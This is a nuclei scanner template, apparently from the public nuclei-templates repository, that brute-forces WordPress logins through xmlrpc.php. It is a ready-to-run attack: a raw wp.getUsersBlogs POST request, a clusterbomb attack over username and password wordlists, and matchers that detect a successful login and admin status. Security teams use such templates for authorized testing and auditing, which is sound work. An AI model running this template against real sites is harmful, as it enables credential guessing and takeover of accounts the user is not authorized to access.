nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml

53 lines
1.5 KiB
YAML

id: wordpress-xmlrpc-brute-force
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
severity: high
description: This template bruteforces username and passwords through xmlrpc.php being available.
reference:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
metadata:
max-request: 276
tags: wordpress,php,xmlrpc,bruteforce
http:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{{username}}</value>
</param>
<param>
<value>{{password}}</value>
</param>
</params>
</methodCall>
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'url'
- 'xmlrpc'
- 'isAdmin'
condition: and
# digest: 4a0a0047304502210099e858a727502be5806faf777940504e60eb4ff367ce58779cbd952547018c3502207b54c8f1b32b85f47ed048a7fd956cbbd58a85fdf1895e055b89e9bc1ed0653d:922c64590222798bb761d5b6d8e72950